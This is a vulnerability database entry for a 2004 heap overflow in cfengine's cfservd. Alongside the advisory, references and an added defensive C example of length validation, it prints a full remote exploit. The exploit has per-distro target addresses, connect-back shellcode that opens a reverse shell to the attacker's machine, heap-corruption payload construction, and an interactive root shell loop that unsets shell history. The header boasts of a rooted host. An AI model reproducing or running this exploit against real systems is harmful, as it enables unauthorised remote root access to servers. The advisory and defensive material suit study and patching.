GNU CFEngine AuthenticationDialogue Remote Heap-Based Buffer Overflow Vulnerability


Vulnerability ID 1108114 Vulnerability Type Buffer overflow
Published 2004-08-09 Updated 2005-10-20
CVE ID CVE-2004-1701
CNNVD-ID CNNVD-200408-124
Platform Linux CVSS Score 10.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/24361
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-124
|Vulnerability Details
The AuthenticationDialogue function in cfservd in Cfengine 2.0.0 through 2.1.7p1 contains a heap-based buffer overflow. A remote attacker can execute arbitrary code via an overly long SAUTH command sent during RSA authentication.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/10899/info
 
GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function.
 
The issue exists due to a lack of sufficient boundary checks performed on challenge data that is received from a client.
 
Because the size of the buffer, the size of data copied in a memcpy() operation, and the data copied are all controlled by the attacker, a remote attacker may likely exploit this condition to corrupt in-line heap-based memory management data.
 
cfservd employs an IP based access control method. This access control must be bypassed prior to exploitation. This may hinder exploitation attempts.
 
This vulnerability is reported to affect versions 2.0.0 to 2.1.7p1 of cfengine cfservd.
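The advisory above boils down to one pattern: lengths supplied by the client are used, unvalidated, to size a heap allocation and a memcpy() into it. The C below is an added example written for this page, not cfengine's own code. It models an "SAUTH <c> <crypt_len> <nonce_len> <payload>" message (the field layout, the meaning of the two numbers and the MAX_CHALLENGE limit are assumptions for illustration) and places the unchecked pattern beside the hardened form: the hardened version rejects a message before any memory operation unless every client-supplied length is positive, within a fixed maximum, covered by the bytes actually received, and no larger than the buffer it will be copied into. The sample messages are constructed, not captured traffic.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed upper bound on a legitimate challenge (a real daemon would take
 * this from its protocol constants). */
#define MAX_CHALLENGE 512

/* What the server intends to do with one SAUTH message. */
struct copy_plan {
        size_t hdr_len;    /* bytes of header before the challenge payload */
        size_t alloc_len;  /* bytes to malloc() for the challenge */
        size_t copy_len;   /* bytes to memcpy() into that buffer */
};

/* Parse the assumed header "SAUTH <c> <crypt_len> <nonce_len> " from a
 * receive buffer that is not NUL-terminated.  Returns header length or -1. */
static int parse_sauth_header(const char *msg, size_t msg_len,
                              char *iscrypt, long *crypt_len, long *nonce_len)
{
        char hdr[64];
        size_t n = msg_len < sizeof hdr - 1 ? msg_len : sizeof hdr - 1;
        int consumed = 0;

        memcpy(hdr, msg, n);              /* sscanf needs a terminated copy */
        hdr[n] = '\0';
        if (sscanf(hdr, "SAUTH %c %ld %ld%n", iscrypt, crypt_len, nonce_len,
                   &consumed) != 3)
                return -1;
        if ((size_t)consumed < n && hdr[consumed] == ' ')
                consumed++;               /* single separator before payload */
        return consumed;
}

/* Unchecked pattern (the flaw the advisory describes): allocation and copy
 * sizes come straight from client-supplied numbers, tied neither to each
 * other nor to how many bytes were actually received. */
int plan_unchecked(const char *msg, size_t msg_len, struct copy_plan *p)
{
        char c; long clen, nlen;
        int hdr = parse_sauth_header(msg, msg_len, &c, &clen, &nlen);
        if (hdr < 0) return -1;
        p->hdr_len = (size_t)hdr;
        p->alloc_len = (size_t)nlen;
        p->copy_len = (size_t)clen;
        return 0;
}

/* Hardened pattern: validate every length before touching memory. */
int plan_checked(const char *msg, size_t msg_len, struct copy_plan *p)
{
        char c; long clen, nlen;
        int hdr = parse_sauth_header(msg, msg_len, &c, &clen, &nlen);
        if (hdr < 0) return -1;
        if (clen <= 0 || nlen <= 0) return -1;                       /* zero/negative */
        if (clen > MAX_CHALLENGE || nlen > MAX_CHALLENGE) return -1; /* implausible */
        if ((size_t)clen > msg_len - (size_t)hdr) return -1;         /* more than received */
        if (clen > nlen) return -1;                                   /* copy > allocation */
        p->hdr_len = (size_t)hdr;
        p->alloc_len = (size_t)nlen;
        p->copy_len = (size_t)clen;
        return 0;
}

/* Allocates and copies only for a plan that passed plan_checked().
 * Returns a malloc()ed buffer of alloc_len bytes, or NULL on rejection. */
char *copy_challenge(const char *msg, size_t msg_len, size_t *out_len)
{
        struct copy_plan p;
        char *buf;
        if (plan_checked(msg, msg_len, &p) < 0) return NULL;
        buf = malloc(p.alloc_len);
        if (buf == NULL) return NULL;
        memcpy(buf, msg + p.hdr_len, p.copy_len); /* copy_len <= alloc_len guaranteed */
        *out_len = p.copy_len;
        return buf;
}

/* Constructed sample messages (not captured traffic). */
static const char GOOD_MSG[]  = "SAUTH n 16 32 0123456789ABCDEF"; /* consistent lengths */
static const char HUGE_MSG[]  = "SAUTH n 00001000 00000010 AAAA";  /* copy 1000 into 10 bytes */
static const char SHORT_MSG[] = "SAUTH n 64 64 AB";                 /* claims 64, sends 2 */

/* 1 if the unchecked pattern would copy more bytes than it allocated. */
int demo_unchecked_would_overflow(void)
{
        struct copy_plan p;
        if (plan_unchecked(HUGE_MSG, sizeof HUGE_MSG - 1, &p) < 0) return -1;
        return p.copy_len > p.alloc_len;
}

/* Number of the two hostile messages the hardened check rejects (expect 2). */
int demo_checked_rejects(void)
{
        struct copy_plan p;
        int rejected = 0;
        rejected += plan_checked(HUGE_MSG, sizeof HUGE_MSG - 1, &p) < 0;
        rejected += plan_checked(SHORT_MSG, sizeof SHORT_MSG - 1, &p) < 0;
        return rejected;
}

/* 1 if the well-formed message is accepted and its payload copied intact. */
int demo_checked_accepts(void)
{
        size_t len = 0;
        char *buf = copy_challenge(GOOD_MSG, sizeof GOOD_MSG - 1, &len);
        int ok = buf != NULL && len == 16 && memcmp(buf, "0123456789ABCDEF", 16) == 0;
        free(buf);
        return ok;
}

int main(void)
{
        printf("unchecked pattern would overflow: %d\n", demo_unchecked_would_overflow());
        printf("hardened check rejects %d of 2 hostile messages\n", demo_checked_rejects());
        printf("hardened check accepts well-formed message: %d\n", demo_checked_accepts());
        return 0;
}
```

The check that matters most is the one against the received byte count: a declared length that exceeds the data on the wire is the signature of this bug class, and it is also the easiest thing for a protocol-aware sensor to flag on a cfservd port.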

/*           _ ________            _____                        ______
 *
 * cfengine rsa heap remote exploit  part of PTjob project /   / "fuck mm"
 * by jsk:exworm(http://exworm.hostrocket.com)            /
 * bug found by core
 * yep ta mei dayong ..hehe..so pub it..
 * my home: www.ph4nt0m.org
 * GT: emm.oyxin.seal.ava.haggis.b_root.more..
 * No girl No money  No jop...
 * bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23
 * cfengine rsa heap remote exploit ....s
 * --------------------------------------------------(need money.to..fk..girl..)
 * [+] lisntener...
 * [+] Connected, sending code...
 * [+] Ret: 0x0819f03e
 * [+] Got: 0x0811a590
 * [+] ownedbyOseen!
 * -----------------------------------------------------------
 * Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 *(wheel)
 *
 *
 */

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <errno.h>
#include <linux/sockios.h>

#define BUF 1024


struct {
        char *distro;
        char *type;
        unsigned long ret;
        unsigned long got;

} targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine ;) */
        { "Redhat 7.3 ", "cfengine 2.1.7p1  ",0x0819f03e , 0x0811a590 },
        /* the two addresses below were redacted (**********) by the author;
         * zero placeholders keep the table compiling  ( hehe:use fast-bin tips) */
        { "redhat 9.0  ", "cfengine 2.1.7p1", 0x00000000, 0x00000000 },
        { "Redhat  7.2  ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 },
        { "Redhat 7.1     ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 },
        { "Crash          ", "(All platforms)  ", 0x42424242, 0x41414141 },
};
#define NTARGETS (sizeof(targets) / sizeof(targets[0]))

char linux_connect_back[] =  /* connect back 45295 */
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x41\x42\x43\x44\x66\x68\xb0"
        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80";
int sock;
void usage();
void shell();


void
usage(char *prog)
{
        fprintf(stderr,"Usage: %s -t [-pah]\n",prog);
        fprintf(stderr,"-t version       Linux version.\n");
        fprintf(stderr,"-h target       The host to attack.\n");
        fprintf(stderr,"-a password     Default password is \"sorry no password. \".\n");
        fprintf(stderr,"-p port         Default port is 5308.\n\n");
}

int
openhost(char *host,int port)
{
        struct sockaddr_in addr;
        struct hostent *he;

        he=gethostbyname(host);

        if (he==NULL) return -1;
        sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
        if (sock==-1) return -1;

        memcpy(&addr.sin_addr, he->h_addr, he->h_length);

        addr.sin_family=AF_INET;
        addr.sin_port=htons(port);

        if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        sock=-1;
        return sock;
}


void
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock, &fd_read);
                FD_SET(0,    &fd_read);

                if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;

                if (FD_ISSET(sock, &fd_read)) {
                        if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "[+] EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) <0) break;
                }

                if (FD_ISSET(0, &fd_read)) {
                        if ((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr,"[+] EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }
        }

        fprintf(stderr,"[+] Connection lost.\n\n");
        exit(0);
}

unsigned char
*get_my_ip_addr(int sockfd, struct ifreq *ifr)
{
        struct sockaddr_in sin;
        char *b = (char *) malloc(4);

        if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
                fprintf(stderr, "Unable to get the local IP Address, use -d.\n");
                exit(1);
        }

        memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
        memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
        return b;
}


int
main (int argc,char *argv[])
{
        char buf1[512];
        char buf2[512];
        char host[256] = "";
        char pass[256]="changeme";

        int  type= 0;
        int c=0;
        int port=5308;                  /* cfservd default; overridden by -p */
        char device[256] = "eth0";
        unsigned char *ptr;

        struct sockaddr_in sin_listener;
        struct ifreq ifr;
        struct timeval timeout;

        fd_set fdread;

        int delay       = 12;
        int i           = 0;
        int local_port  = 0;
        int ret         = 0;
        socklen_t sin_len = sizeof (struct sockaddr_in);
        int sock2       = 0;
        int sockd       = 0;
        int listener    = 0;
        int time_out    = 4;

        srand(getpid());

        fprintf(stdout,"cfengine rsa heap remote exploit ....s\n");
        fprintf(stdout,"--------------------------------------------------(need money.to..fk..girl..)\n");

        while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
        {
                switch(c)
                {
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.\n\n");
                                        exit(1);
                                }
                                break;
                        case 'a':
                                memset(pass,0x0,sizeof(pass));
                                strncpy(pass,optarg,sizeof(pass) - 1);
                                break;
                        case 't':
                                type = atoi(optarg);
                                if (type <= 0 || type > (int) NTARGETS) {
                                        for(i = 0; i < (int) NTARGETS; i++)
                                        fprintf(stderr, "%02d. %s - %s      [0x%08lx - 0x%08lx]\n",
                                                i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].got);
                                        return -1;
                                }
                                break;
                        case 'h':
                                memset(host,0x0,sizeof(host));
                                strncpy(host,optarg,sizeof(host) - 1);
                                break;

                        default:
                                usage(argv[0]);
                                exit(1);
                                break;
                }
        }

        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;

        /* -h and -t are both required; type 0 would index targets[-1] */
        if (strlen(host) == 0 || type == 0) {
                usage(argv[0]);
                exit(1);
        }
        sock=openhost(host, port);

        if (sock==-1) {
                fprintf(stderr,"- Unable to connect.\n\n");
                exit(1);
        }

        strncpy(ifr.ifr_name, device, 15);

        if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
                fprintf(stderr, "socket() error.\n");
                return -1;
        }

        if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                fprintf(stderr, "socket() error.\n");
                return -1;
        }

        ptr = get_my_ip_addr(sockd, &ifr);
        memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);

        sin_listener.sin_family = AF_INET;
        memset(&sin_listener.sin_zero, 0x00, 8);

        /* the listener port is fixed: it is the port encoded in the shellcode */
        local_port = 45295;
        sin_listener.sin_port = htons(local_port);
        if (bind(listener, (struct sockaddr *) &sin_listener, sin_len) < 0) {
                fprintf(stderr, "bind() error: %s\n", strerror(errno));
                return -1;
        }

        listen(listener, 1);
        fprintf(stdout, "[+] lisntener...\n");
        /* patch the local IP into the shellcode's placeholder bytes ("ABCD") */
        linux_connect_back[33] = (unsigned int) *(ptr + 0);
        linux_connect_back[34] = (unsigned int) *(ptr + 1);
        linux_connect_back[35] = (unsigned int) *(ptr + 2);
        linux_connect_back[36] = (unsigned int) *(ptr + 3);

        memset(buf2,  0x0, sizeof(buf2));
        memset(buf1, 0x90, sizeof(buf1));

        for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];

        buf1[0] = (0x41414141 & 0x000000ff);
        buf1[1] = (0x41414141 & 0x0000ff00) >> 8;
        buf1[2] = (0x41414141 & 0x00ff0000) >> 16;
        buf1[3] = (0x41414141 & 0xff000000) >> 24;

        buf1[4] = (0x58585858 & 0x000000ff);
        buf1[5] = (0x58585858 & 0x0000ff00) >> 8;
        buf1[6] = (0x58585858 & 0x00ff0000) >> 16;
        buf1[7] = (0x58585858 & 0xff000000) >> 24;

        buf1[8] = (0xfffffffc & 0x000000ff);
        buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;
        buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;
        buf1[11] = (0xfffffffc & 0xff000000) >> 24;

        buf1[12] = (0xffffffff & 0x000000ff);
        buf1[13] = (0xffffffff & 0x0000ff00) >> 8;
        buf1[14] = (0xffffffff & 0x00ff0000) >> 16;
        buf1[15] = (0xffffffff & 0xff000000) >> 24;

        buf1[16] = (targets[type - 1].got -12 & 0x000000ff);
        buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;
        buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;
        buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;

        buf1[20] = (targets[type - 1].ret & 0x000000ff);
        buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;
        buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;
        buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;


        for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)
        {
                buf1[i + 24] = 0x7f;
                buf1[i + 25] = 0xeb;
        }
        for(; i < 300 - sizeof(linux_connect_back) - 1; i++)
                buf1[i + 24] = 0x90;
        strcpy(buf1 + i + 24, linux_connect_back);
        buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\n';
        buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\0';


        sprintf(buf2,   "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%s\r\n", buf1);

        fprintf(stdout, "Connected, sending code...\n");
        fprintf(stdout, "[+] Ret: 0x%08lx\n", targets[type - 1].ret);
        fprintf(stdout, "[+] Got: 0x%08lx\n", targets[type - 1].got);
        while(1) {
                write(sock, buf2, strlen(buf2));
                close(sock);
                sleep(2);
                FD_ZERO(&fdread);
                FD_SET(listener, &fdread);

                timeout.tv_sec = time_out;
                timeout.tv_usec = 0;

                while(1) {

                        ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);

                        if (ret < 0) {
                                close(sock);
                                close(listener);
                                fprintf(stderr, "select() error.\n");
                                return -1;
                        }

                        if (ret == 0) {
                                fprintf(stderr, "[+] Failed, waiting %d seconds.\n"
                                                "[+] Use ctrl-c to abort.\n", delay);
                                sleep(delay);
                                /* the socket was closed after the write above, so reconnect before retrying */
                                sock = openhost(host, port);
                                if (sock == -1) {
                                        fprintf(stderr, "- Unable to reconnect.\n\n");
                                        close(listener);
                                        return -1;
                                }
                                break;
                        }

                        if(FD_ISSET(listener, &fdread)) {
                                sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
                                close(sock);
                                close(listener);

                                fprintf(stderr, "[+] ownedbyOseen!\n"
                                                "-----------------------------------------------------------\n");
                                shell(sock2);
                                close(sock2);
                                return 0;
                        }
                }

        }

        fprintf(stderr, "[+] Exploit failed.\n");
        close(listener);
        close(sock);
        return 0;

}
|References

Source: XF
Name: cfengine-cfservd-command-execution(16935)
Link: http://xforce.iss.net/xforce/xfdb/16935
Source: BID
Name: 10899
Link: http://www.securityfocus.com/bid/10899
Source: www.coresecurity.com
Link: http://www.coresecurity.com/common/showdoc.php?idx=387&idxseccion=10
Source: GENTOO
Name: GLSA-200408-08
Link: http://security.gentoo.org/glsa/glsa-200408-08.xml
Source: SECUNIA
Name: 12251
Link: http://secunia.com/advisories/12251
Source: BUGTRAQ
Name: 20050219 cfengine rsa heap remote exploit: part of PTjob project
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110886670528775&w=2
Source: BUGTRAQ
Name: 20040809 CORE-2004-0714: Cfengine RSA Authentication Heap Corruption
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109208394910086&w=2
